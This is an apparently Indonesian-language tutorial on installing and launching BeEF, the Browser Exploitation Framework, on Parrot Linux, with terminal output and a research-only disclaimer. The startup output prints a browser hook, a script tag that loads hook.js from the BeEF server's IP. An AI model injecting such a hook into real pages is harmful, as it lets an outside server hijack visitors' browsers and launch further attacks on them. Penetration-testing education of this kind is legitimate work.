BeEF merupakan kependekan dari The Browser Exploitation Framework. Ini adalah alat pengujian penetrasi yang berfokus pada peramban web.
Di tengah meningkatnya kekhawatiran tentang serangan yang ditularkan melalui web terhadap klien, termasuk klien seluler, BeEF memungkinkan penguji penetrasi profesional untuk menilai postur keamanan aktual dari lingkungan target dengan menggunakan vektor serangan dari sisi klien. Tidak seperti kerangka kerja keamanan lainnya, BeEF melihat melewati perimeter jaringan dan sistem klien yang telah dikeraskan, dan memeriksa eksploitasi dalam konteks satu pintu yang terbuka: browser web. BeEF akan mengaitkan satu atau lebih browser web dan menggunakannya sebagai tempat berpijak untuk meluncurkan modul perintah terarah dan serangan lebih lanjut terhadap sistem dari dalam konteks browser.
Berikut cara instalasi BeEF pada Linux:
1. Masuk ke terminal, lalu ketikan perintah:
sudo apt install beef-xss┌─[root@parrot]─[/home/ghostx9x0]
└──╼ #sudo apt install beef-xss
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
beef-xss is already the newest version (0.5.4.0-0parrot2).
0 upgraded, 0 newly installed, 0 to remove and 255 not upgraded.2. Setelah itu, saatnya kita menjalankan BeEF Browser tersebut dengan cara masukan perintah:
sudo beef-xss┌─[root@parrot]─[/home/ghostx9x0]
└──╼ #sudo beef-xss
[i] Something is already using port: 3000/tcp
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
ruby 1884 beef-xss 13u IPv4 41166 0t0 TCP *:3000 (LISTEN)
UID PID PPID C STIME TTY STAT TIME CMD
beef-xss 1884 1 0 15:35 ? Ssl 0:03 ruby /usr/share/beef-xss/beef
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*] Web UI: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
● beef-xss.service - beef-xss
Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled)
Active: active (running) since Sat 2024-02-03 15:35:02 WIB; 12min ago
Main PID: 1884 (ruby)
Tasks: 3 (limit: 4590)
Memory: 156.9M
CPU: 3.810s
CGroup: /system.slice/beef-xss.service
└─1884 ruby /usr/share/beef-xss/beef
Feb 03 15:35:10 parrot beef[1884]: == 24 CreateAutoloader: migrated (0.0010s) ====================================
Feb 03 15:35:10 parrot beef[1884]: == 25 CreateXssraysScan: migrating ============================================
Feb 03 15:35:10 parrot beef[1884]: -- create_table(:xssraysscans, {})
Feb 03 15:35:10 parrot beef[1884]: -> 0.0024s
Feb 03 15:35:10 parrot beef[1884]: == 25 CreateXssraysScan: migrated (0.0027s) ===================================
Feb 03 15:35:10 parrot beef[1884]: [15:35:05][*] BeEF is loading. Wait a few seconds...
Feb 03 15:35:10 parrot beef[1884]: [15:35:10][!] [AdminUI] Error: Could not minify JavaScript file: web_ui_all
Feb 03 15:35:10 parrot beef[1884]: [15:35:10] |_ [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
Feb 03 15:35:10 parrot beef[1884]: [15:35:10][!] [AdminUI] Error: Could not minify JavaScript file: web_ui_auth
Feb 03 15:35:10 parrot beef[1884]: [15:35:10] |_ [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...
3. apabila sudah terlihat running, akses alamat BeEF tertera via Browser
4. Lalu akan muncul halaman login, masukan username dan password yang telah kita dibuat:
selesai, sisanya kita bisa coba dan explore sendiri
catatan:
Perhatian! hanya untuk riset dan keperluan belajar, apabila sengaja dipakai untuk hal yang negatif kami tidak akan bertanggung jawab, semuanya diserahkan kepada yang melakukan. Terima kasih
